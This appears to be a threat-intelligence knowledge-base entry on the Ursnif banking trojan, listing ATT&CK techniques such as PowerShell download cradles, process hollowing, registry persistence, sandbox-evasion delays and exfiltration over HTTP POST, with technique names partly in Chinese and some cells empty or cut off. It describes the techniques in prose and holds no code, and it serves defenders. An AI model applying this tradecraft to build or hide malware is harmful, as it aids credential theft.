Ursnif
Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[1][2] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[3]
Associated Software Descriptions
Techniques Used
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1047 | Windows管理规范 |
Ursnif droppers have used WMI classes to execute PowerShell commands.[5] |
|
| Enterprise | T1005 | 从本地系统获取数据 |
Ursnif has collected files from victim machines, including certificates and cookies.[6] |
|
| Enterprise | T1090 | 代理 | ||
| .003 | Multi-hop Proxy | |||
| Enterprise | T1036 | .005 | 伪装: Match Legitimate Name or Location |
Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.[3] |
| Enterprise | T1112 | 修改注册表 |
Ursnif has used Registry modifications as part of its installation routine.[6][2] |
|
| Enterprise | T1543 | .003 | 创建或修改系统进程: Windows Service |
Ursnif has registered itself as a system service in the Registry for automatic execution at system startup.[7] |
| Enterprise | T1568 | .002 | 动态解析: Domain Generation Algorithms | |
| Enterprise | T1140 | 反混淆/解码文件或信息 |
Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.[2] |
|
| Enterprise | T1547 | .001 | 启动或登录自动启动执行: Registry Run Keys / Startup Folder |
Ursnif has used Registry Run keys to establish automatic execution at system startup.[7][6] |
| Enterprise | T1059 | .001 | 命令与脚本解释器: PowerShell |
Ursnif droppers have used PowerShell in download cradles to download and execute the malware's full executable payload.[5] |
| .005 | 命令与脚本解释器: Visual Basic |
Ursnif droppers have used VBA macros to download and execute the malware's full executable payload.[5] |
||
| Enterprise | T1113 | 屏幕捕获 | ||
| Enterprise | T1071 | .001 | 应用层协议: Web Protocols | |
| Enterprise | T1074 | .001 | 数据分段: Local Data Staging | |
| Enterprise | T1132 | 数据编码 | ||
| Enterprise | T1106 | 本机API |
Ursnif has used |
|
| Enterprise | T1012 | 查询注册表 |
Ursnif has used Reg to query the Registry for installed programs.[3][6] |
|
| Enterprise | T1080 | 污染共享内容 |
Ursnif has copied itself to and infected files in network drives for propagation.[3][8] |
|
| Enterprise | T1185 | 浏览器会话劫持 |
Ursnif has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords).[6] |
|
| Enterprise | T1027 | .010 | 混淆文件或信息: Command Obfuscation |
Ursnif droppers execute base64 encoded PowerShell commands.[5] |
| .013 | 混淆文件或信息: Encrypted/Encoded File |
Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk.[2] Ursnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands.[5] |
||
| Enterprise | T1070 | .004 | 移除指标: File Deletion |
Ursnif has deleted data staged in tmp files after exfiltration.[3] |
| Enterprise | T1082 | 系统信息发现 |
Ursnif has used Systeminfo to gather system information.[3] |
|
| Enterprise | T1007 | 系统服务发现 | ||
| Enterprise | T1497 | .003 | 虚拟化/沙盒规避: Time Based Evasion |
Ursnif has used a 30 minute delay after execution to evade sandbox monitoring tools.[8] |
| Enterprise | T1105 | 输入工具传输 |
Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.[7][6] |
|
| Enterprise | T1056 | .004 | 输入捕获: Credential API Hooking |
Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.[3] |
| Enterprise | T1057 | 进程发现 |
Ursnif has gathered information about running processes.[3][6] |
|
| Enterprise | T1055 | .005 | 进程注入: Thread Local Storage |
Ursnif has injected code into target processes via thread local storage callbacks.[3][7][4] |
| .012 | 进程注入: Process Hollowing |
Ursnif has used process hollowing to inject into child processes.[4] |
||
| Enterprise | T1559 | .001 | 进程间通信: Component Object Model |
Ursnif droppers have used COM objects to execute the malware's full executable payload.[5] |
| Enterprise | T1041 | 通过C2信道渗出 |
Ursnif has used HTTP POSTs to exfil gathered information.[3][4][2] |
|
| Enterprise | T1091 | 通过可移动媒体复制 |
Ursnif has copied itself to and infected removable drives for propagation.[3][8] |
|
| Enterprise | T1564 | .003 | 隐藏伪装: Hidden Window |
Ursnif droppers have used COM properties to execute malware in hidden windows.[5] |
Groups That Use This Software
References
- NJCCIC. (2016, September 27). Ursnif. Retrieved September 12, 2024.
- Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.
- Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.
- Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.
- Holland, A. (2019, March 7). Tricks and COMfoolery: How Ursnif Evades Detection. Retrieved June 10, 2019.
- Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019.
- Trend Micro. (2014, December 11). PE_URSNIF.A2. Retrieved June 5, 2019.
- Caragay, R. (2014, December 11). Info-Stealing File Infector Hits US, UK. Retrieved June 5, 2019.
- Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.
- Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
- Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.
- Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021.